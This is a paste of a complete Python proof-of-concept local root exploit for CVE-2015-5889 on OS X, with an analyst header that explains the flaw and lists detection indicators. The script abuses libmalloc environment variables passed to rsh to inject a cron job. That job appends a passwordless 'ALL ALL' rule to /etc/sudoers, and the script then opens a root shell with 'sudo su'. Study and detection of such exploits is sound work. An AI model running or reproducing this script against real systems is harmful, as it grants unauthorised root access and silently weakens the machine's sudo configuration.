
nullbyte

a guest May 25th, 2016 1,226 Never
# CVE-2015-5889: issetugid() + rsh + libmalloc OS X local root (proof of concept)
# Credited on the original paste to "rebel", jul/2015; tested there on
# OS X 10.9.5 / 10.10.5.
#
# Analyst reading of the script:
#   * /usr/bin/rsh is started with three libmalloc debugging variables in its
#     environment. MallocLogFile names /etc/crontab, and the value given for
#     MallocStackLoggingDirectory embeds a cron entry. Going by the title
#     line, the flaw is that these variables are still honoured in a process
#     where issetugid() should have caused them to be ignored (presumably rsh
#     is set-uid root on the affected releases; confirm against the advisory).
#   * The script then checks for two artefacts: the string "NOPASSWD" in
#     /etc/crontab, and a change in the size of /etc/sudoers.
#
# Defensive takeaways:
#   * The same artefacts are the indicators to hunt for: Malloc* variables in
#     the environment of a privileged binary, unexpected content in
#     /etc/crontab, and a new NOPASSWD rule in /etc/sudoers.
#   * File-integrity monitoring on both files, plus process telemetry that
#     records the environment of set-uid executions, covers each stage.
#   * Remediation is the vendor fix for CVE-2015-5889; the paste lists only
#     the releases it was tested on, so take the fixed version from Apple's
#     advisory.

import os
import sys
import time

SUDOERS_PATH = "/etc/sudoers"
CRONTAB_PATH = "/etc/crontab"

report = sys.stderr.write

# Size of sudoers before anything runs; the wait loop further down compares
# against this value to notice when the file has been modified.
baseline_size = os.stat(SUDOERS_PATH).st_size

# Complete environment handed to rsh (nothing is inherited from the caller).
malloc_env = {
    'MallocLogFile': CRONTAB_PATH,
    'MallocStackLogging': 'yes',
    'MallocStackLoggingDirectory': 'a\n* * * * * root echo "ALL ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers\n\n\n\n\n',
}

report("creating /etc/crontab..")

child_pid = os.fork()
if child_pid == 0:
    # Child process: stdout and stderr are closed before the exec. The paste
    # does not state why; the exec replaces the child, so nothing after it
    # runs unless the exec itself fails.
    for fd in (1, 2):
        os.close(fd)
    os.execve("/usr/bin/rsh", ["rsh", "localhost"], malloc_env)

# Parent: give the child a moment to run before inspecting the result.
time.sleep(1)

crontab_text = open(CRONTAB_PATH).read()
if crontab_text.find("NOPASSWD") < 0:
    # The marker string never reached /etc/crontab.
    report("failed\n")
    sys.exit(-1)

report("done\nwaiting for /etc/sudoers to change (<60 seconds)..")

# Poll once per second until the sudoers size differs from the baseline.
while True:
    if os.stat(SUDOERS_PATH).st_size != baseline_size:
        break
    report(".")
    time.sleep(1)

report("\ndone\n")

# Relies on the sudoers rule appended by the cron entry above.
os.system("sudo su")